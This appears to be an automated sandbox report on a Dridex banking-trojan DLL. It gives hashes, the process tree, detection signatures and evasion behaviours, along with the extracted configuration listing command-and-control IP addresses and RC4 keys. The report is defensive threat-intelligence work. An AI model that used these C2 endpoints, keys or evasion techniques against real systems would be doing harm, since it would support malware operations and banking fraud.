Play interactive tour

Edit tour

Windows Analysis Report SecuriteInfo.com.W32.AIDetect.malware1.4295.1397

Overview

General Information

Sample Name:	SecuriteInfo.com.W32.AIDetect.malware1.4295.1397 (renamed file extension from 1397 to dll)
Analysis ID:	544174
MD5:	57cc0ec93c55348dd7b864e26ec96379
SHA1:	bcf46bb64fc5a673e7889d9ba9baad26bfab0ff7
SHA256:	60bd3eba4dac7d37cd07e375f4dbfe5e816b0ab599f28da31c5cf5b180b5849a
Tags:	dllDridex
Infos:
Most interesting Screenshot:

Detection

Dridex

Score:	76
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Yara detected Dridex unpacked file

Multi AV Scanner detection for submitted file

Sigma detected: Suspicious Call by Ordinal

Tries to delay execution (extensive OutputDebugStringW loop)

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

AV process strings found (often used to terminate AV products)

Sample file is different than original file name gathered from version info

One or more processes crash

Contains functionality to query locales information (e.g. system language)

Uses code obfuscation techniques (call, push, ret)

Checks if the current process is being debugged

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to call native functions

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Creates a process in suspended mode (likely to inject code)

IP address seen in connection with other malware

Entry point lies outside standard sections

Abnormal high CPU Usage

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 1172 cmdline: loaddll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.4295.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)

cmd.exe (PID: 5352 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.4295.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 6452 cmdline: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.4295.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 6540 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6452 -s 684 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

cleanup

Malware Configuration

Threatname: Dridex

{"Version": 22201, "C2 list": ["144.91.122.102:443", "85.10.248.28:593", "185.4.135.27:5228", "80.211.3.13:8116"], "RC4 keys": ["3IC8sFlUX9XZuoBQY9u5LhcZnHsV7E5r", "hnk63OiMfIbUqQnY7gkPwplwC0Ue5ZkZBYMCTYTjntqX7zsy9OvtNUlthJZXRtFF6P52Zbz6R5"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000003.00000002.711138544.000000006E7C1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000003.00000000.675076733.000000006E7C1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000000.00000002.1192296113.000000006E7C1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000003.00000000.673891471.000000006E7C1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security

Unpacked PEs

Source	Rule	Description	Author
0.2.loaddll32.exe.6e7c0000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
3.2.rundll32.exe.6e7c0000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
3.0.rundll32.exe.6e7c0000.5.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
3.0.rundll32.exe.6e7c0000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security

Sigma Overview

System Summary:

Sigma detected: Suspicious Call by Ordinal

Show sources

Source: Process started

Author: Florian Roth: Data: Command: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.4295.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.4295.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.4295.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5352, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.4295.dll",#1, ProcessId: 6452

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 3.2.rundll32.exe.6e7c0000.2.unpack

Malware Configuration Extractor: Dridex {"Version": 22201, "C2 list": ["144.91.122.102:443", "85.10.248.28:593", "185.4.135.27:5228", "80.211.3.13:8116"], "RC4 keys": ["3IC8sFlUX9XZuoBQY9u5LhcZnHsV7E5r", "hnk63OiMfIbUqQnY7gkPwplwC0Ue5ZkZBYMCTYTjntqX7zsy9OvtNUlthJZXRtFF6P52Zbz6R5"]}

Multi AV Scanner detection for submitted file

Show sources

Source: SecuriteInfo.com.W32.AIDetect.malware1.4295.dll

Virustotal: Detection: 23%

Perma Link

Source: SecuriteInfo.com.W32.AIDetect.malware1.4295.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: SecuriteInfo.com.W32.AIDetect.malware1.4295.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000007.00000003.679850173.0000000003635000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.679379034.0000000003635000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.679310884.0000000005250000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.680363692.0000000003635000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.686135590.00000000055A1000.00000004.00000001.sdmp
Source:	Binary string: sfc_os.pdb source: WerFault.exe, 00000007.00000003.686154276.0000000005576000.00000004.00000040.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 00000007.00000003.686154276.0000000005576000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000007.00000003.686145232.0000000005570000.00000004.00000040.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 00000007.00000003.686135590.00000000055A1000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 00000007.00000003.686145232.0000000005570000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: loaddll32.exe, 00000000.00000003.677850245.000000004B280000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.681408644.000000000362F000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.679833031.000000000362F000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.686135590.00000000055A1000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 00000007.00000003.686145232.0000000005570000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000007.00000003.686135590.00000000055A1000.00000004.00000001.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 00000007.00000003.686154276.0000000005576000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 00000007.00000003.686154276.0000000005576000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 00000007.00000003.686154276.0000000005576000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdbS source: WerFault.exe, 00000007.00000003.686154276.0000000005576000.00000004.00000040.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 00000007.00000003.686145232.0000000005570000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000007.00000003.686135590.00000000055A1000.00000004.00000001.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000007.00000003.680379903.000000000363B000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.680903466.000000000363B000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.679394161.000000000363B000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.679856947.000000000363B000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.686135590.00000000055A1000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000007.00000003.686154276.0000000005576000.00000004.00000040.sdmp
Source:	Binary string: mpr.pdb source: WerFault.exe, 00000007.00000003.686145232.0000000005570000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 00000007.00000003.686154276.0000000005576000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000007.00000003.686135590.00000000055A1000.00000004.00000001.sdmp
Source:	Binary string: setupapi.pdb source: WerFault.exe, 00000007.00000003.686154276.0000000005576000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb source: WerFault.exe, 00000007.00000003.686154276.0000000005576000.00000004.00000040.sdmp
Source:	Binary string: imagehlp.pdb source: WerFault.exe, 00000007.00000003.686154276.0000000005576000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdbA/ source: WerFault.exe, 00000007.00000003.686154276.0000000005576000.00000004.00000040.sdmp
Source:	Binary string: dwmapi.pdb source: WerFault.exe, 00000007.00000003.686154276.0000000005576000.00000004.00000040.sdmp
Source:	Binary string: oleaut32.pdbM# source: WerFault.exe, 00000007.00000003.686154276.0000000005576000.00000004.00000040.sdmp
Source:	Binary string: setupapi.pdbY source: WerFault.exe, 00000007.00000003.686154276.0000000005576000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdb_ source: WerFault.exe, 00000007.00000003.686154276.0000000005576000.00000004.00000040.sdmp
Source:	Binary string: RFFGTEQ.pdb source: SecuriteInfo.com.W32.AIDetect.malware1.4295.dll
Source:	Binary string: wntdll.pdb( source: WerFault.exe, 00000007.00000003.681408644.000000000362F000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.679833031.000000000362F000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdbk source: WerFault.exe, 00000007.00000003.686145232.0000000005570000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 00000007.00000003.686154276.0000000005576000.00000004.00000040.sdmp
Source:	Binary string: ws2_32.pdb source: WerFault.exe, 00000007.00000003.686154276.0000000005576000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdb source: WerFault.exe, 00000007.00000003.686154276.0000000005576000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000007.00000003.686135590.00000000055A1000.00000004.00000001.sdmp
Source:	Binary string: shell32.pdbk source: WerFault.exe, 00000007.00000003.686145232.0000000005570000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 00000007.00000003.686154276.0000000005576000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 00000007.00000003.686154276.0000000005576000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdb source: WerFault.exe, 00000007.00000003.686154276.0000000005576000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.677850245.000000004B280000.00000004.00000001.sdmp
Source:	Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000007.00000003.686145232.0000000005570000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdbk source: WerFault.exe, 00000007.00000003.686145232.0000000005570000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 00000007.00000003.686154276.0000000005576000.00000004.00000040.sdmp
Source:	Binary string: msctf.pdb source: WerFault.exe, 00000007.00000003.686154276.0000000005576000.00000004.00000040.sdmp
Source:	Binary string: AcLayers.pdb source: WerFault.exe, 00000007.00000003.686135590.00000000055A1000.00000004.00000001.sdmp
Source:	Binary string: shlwapi.pdbG% source: WerFault.exe, 00000007.00000003.686154276.0000000005576000.00000004.00000040.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000007.00000003.686145232.0000000005570000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdbe source: WerFault.exe, 00000007.00000003.686154276.0000000005576000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 00000007.00000003.686154276.0000000005576000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 00000007.00000003.686145232.0000000005570000.00000004.00000040.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000007.00000003.686145232.0000000005570000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb( source: WerFault.exe, 00000007.00000003.680379903.000000000363B000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.680903466.000000000363B000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.679394161.000000000363B000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.679856947.000000000363B000.00000004.00000001.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 00000007.00000003.686145232.0000000005570000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 00000007.00000003.686154276.0000000005576000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb( source: WerFault.exe, 00000007.00000003.679850173.0000000003635000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.679379034.0000000003635000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.680363692.0000000003635000.00000004.00000001.sdmp
Source:	Binary string: rundll32.pdb source: WerFault.exe, 00000007.00000003.686135590.00000000055A1000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 00000007.00000003.686154276.0000000005576000.00000004.00000040.sdmp
Source:	Binary string: sfc.pdb source: WerFault.exe, 00000007.00000003.686154276.0000000005576000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000007.00000003.686135590.00000000055A1000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000007.00000003.686135590.00000000055A1000.00000004.00000001.sdmp

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	IPs: 144.91.122.102:443
Source: Malware configuration extractor	IPs: 85.10.248.28:593
Source: Malware configuration extractor	IPs: 185.4.135.27:5228
Source: Malware configuration extractor	IPs: 80.211.3.13:8116

Source: Joe Sandbox View	ASN Name: TOPHOSTGR TOPHOSTGR
Source: Joe Sandbox View	ASN Name: HETZNER-ASDE HETZNER-ASDE

Source: Joe Sandbox View	IP Address: 185.4.135.27 185.4.135.27
Source: Joe Sandbox View	IP Address: 85.10.248.28 85.10.248.28

Source: WerFault.exe, 00000007.00000002.709699049.00000000051DD000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.707796137.00000000051DD000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Amcache.hve.7.dr	String found in binary or memory: http://upx.sf.net
Source: loaddll32.exe, 00000000.00000002.1192332571.000000006E7DF000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.711170171.000000006E7DF000.00000002.00020000.sdmp	String found in binary or memory: http://www.n4pkg6fy8o.gaDVarFileInfo$

E-Banking Fraud:

Yara detected Dridex unpacked file

Show sources

Source: Yara match	File source: 0.2.loaddll32.exe.6e7c0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.6e7c0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.rundll32.exe.6e7c0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.rundll32.exe.6e7c0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.711138544.000000006E7C1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.675076733.000000006E7C1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1192296113.000000006E7C1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.673891471.000000006E7C1000.00000020.00020000.sdmp, type: MEMORY

System Summary:

Source: SecuriteInfo.com.W32.AIDetect.malware1.4295.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: SecuriteInfo.com.W32.AIDetect.malware1.4295.dll

Binary or memory string: OriginalFilenameIha.dllD vs SecuriteInfo.com.W32.AIDetect.malware1.4295.dll

Source: C:\Windows\SysWOW64\rundll32.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6452 -s 684

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E7D0730	0_2_6E7D0730
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E7D9370	0_2_6E7D9370
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E7D143C	0_2_6E7D143C
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E7C8428	0_2_6E7C8428
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E7CA4E8	0_2_6E7CA4E8
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E7C1494	0_2_6E7C1494

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E7D2234 NtDelayExecution,		0_2_6E7D2234
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E7D2820 NtAllocateVirtualMemory,		0_2_6E7D2820

Source: C:\Windows\System32\loaddll32.exe

Process Stats: CPU usage > 98%

Source: SecuriteInfo.com.W32.AIDetect.malware1.4295.dll

Virustotal: Detection: 23%

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.4295.dll",#1

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.4295.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.4295.dll",#1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.4295.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6452 -s 684
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.4295.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.4295.dll",#1	Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6452

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERFBAC.tmp

Jump to behavior

Source: classification engine

Classification label: mal76.troj.evad.winDLL@6/6@0/4

Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: SecuriteInfo.com.W32.AIDetect.malware1.4295.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: SecuriteInfo.com.W32.AIDetect.malware1.4295.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000007.00000003.679850173.0000000003635000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.679379034.0000000003635000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.679310884.0000000005250000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.680363692.0000000003635000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.686135590.00000000055A1000.00000004.00000001.sdmp
Source:	Binary string: sfc_os.pdb source: WerFault.exe, 00000007.00000003.686154276.0000000005576000.00000004.00000040.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 00000007.00000003.686154276.0000000005576000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000007.00000003.686145232.0000000005570000.00000004.00000040.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 00000007.00000003.686135590.00000000055A1000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 00000007.00000003.686145232.0000000005570000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: loaddll32.exe, 00000000.00000003.677850245.000000004B280000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.681408644.000000000362F000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.679833031.000000000362F000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.686135590.00000000055A1000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 00000007.00000003.686145232.0000000005570000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000007.00000003.686135590.00000000055A1000.00000004.00000001.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 00000007.00000003.686154276.0000000005576000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 00000007.00000003.686154276.0000000005576000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 00000007.00000003.686154276.0000000005576000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdbS source: WerFault.exe, 00000007.00000003.686154276.0000000005576000.00000004.00000040.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 00000007.00000003.686145232.0000000005570000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000007.00000003.686135590.00000000055A1000.00000004.00000001.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000007.00000003.680379903.000000000363B000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.680903466.000000000363B000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.679394161.000000000363B000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.679856947.000000000363B000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.686135590.00000000055A1000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000007.00000003.686154276.0000000005576000.00000004.00000040.sdmp
Source:	Binary string: mpr.pdb source: WerFault.exe, 00000007.00000003.686145232.0000000005570000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 00000007.00000003.686154276.0000000005576000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000007.00000003.686135590.00000000055A1000.00000004.00000001.sdmp
Source:	Binary string: setupapi.pdb source: WerFault.exe, 00000007.00000003.686154276.0000000005576000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb source: WerFault.exe, 00000007.00000003.686154276.0000000005576000.00000004.00000040.sdmp
Source:	Binary string: imagehlp.pdb source: WerFault.exe, 00000007.00000003.686154276.0000000005576000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdbA/ source: WerFault.exe, 00000007.00000003.686154276.0000000005576000.00000004.00000040.sdmp
Source:	Binary string: dwmapi.pdb source: WerFault.exe, 00000007.00000003.686154276.0000000005576000.00000004.00000040.sdmp
Source:	Binary string: oleaut32.pdbM# source: WerFault.exe, 00000007.00000003.686154276.0000000005576000.00000004.00000040.sdmp
Source:	Binary string: setupapi.pdbY source: WerFault.exe, 00000007.00000003.686154276.0000000005576000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdb_ source: WerFault.exe, 00000007.00000003.686154276.0000000005576000.00000004.00000040.sdmp
Source:	Binary string: RFFGTEQ.pdb source: SecuriteInfo.com.W32.AIDetect.malware1.4295.dll
Source:	Binary string: wntdll.pdb( source: WerFault.exe, 00000007.00000003.681408644.000000000362F000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.679833031.000000000362F000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdbk source: WerFault.exe, 00000007.00000003.686145232.0000000005570000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 00000007.00000003.686154276.0000000005576000.00000004.00000040.sdmp
Source:	Binary string: ws2_32.pdb source: WerFault.exe, 00000007.00000003.686154276.0000000005576000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdb source: WerFault.exe, 00000007.00000003.686154276.0000000005576000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000007.00000003.686135590.00000000055A1000.00000004.00000001.sdmp
Source:	Binary string: shell32.pdbk source: WerFault.exe, 00000007.00000003.686145232.0000000005570000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 00000007.00000003.686154276.0000000005576000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 00000007.00000003.686154276.0000000005576000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdb source: WerFault.exe, 00000007.00000003.686154276.0000000005576000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.677850245.000000004B280000.00000004.00000001.sdmp
Source:	Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000007.00000003.686145232.0000000005570000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdbk source: WerFault.exe, 00000007.00000003.686145232.0000000005570000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 00000007.00000003.686154276.0000000005576000.00000004.00000040.sdmp
Source:	Binary string: msctf.pdb source: WerFault.exe, 00000007.00000003.686154276.0000000005576000.00000004.00000040.sdmp
Source:	Binary string: AcLayers.pdb source: WerFault.exe, 00000007.00000003.686135590.00000000055A1000.00000004.00000001.sdmp
Source:	Binary string: shlwapi.pdbG% source: WerFault.exe, 00000007.00000003.686154276.0000000005576000.00000004.00000040.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000007.00000003.686145232.0000000005570000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdbe source: WerFault.exe, 00000007.00000003.686154276.0000000005576000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 00000007.00000003.686154276.0000000005576000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 00000007.00000003.686145232.0000000005570000.00000004.00000040.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000007.00000003.686145232.0000000005570000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb( source: WerFault.exe, 00000007.00000003.680379903.000000000363B000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.680903466.000000000363B000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.679394161.000000000363B000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.679856947.000000000363B000.00000004.00000001.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 00000007.00000003.686145232.0000000005570000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 00000007.00000003.686154276.0000000005576000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb( source: WerFault.exe, 00000007.00000003.679850173.0000000003635000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.679379034.0000000003635000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.680363692.0000000003635000.00000004.00000001.sdmp
Source:	Binary string: rundll32.pdb source: WerFault.exe, 00000007.00000003.686135590.00000000055A1000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 00000007.00000003.686154276.0000000005576000.00000004.00000040.sdmp
Source:	Binary string: sfc.pdb source: WerFault.exe, 00000007.00000003.686154276.0000000005576000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000007.00000003.686135590.00000000055A1000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000007.00000003.686135590.00000000055A1000.00000004.00000001.sdmp

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E7CF6A8 push esi; mov dword ptr [esp], 00000000h

0_2_6E7CF6A9

Source: initial sample

Static PE information: section where entry point is pointing to: .rdata

Source: C:\Windows\SysWOW64\WerFault.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
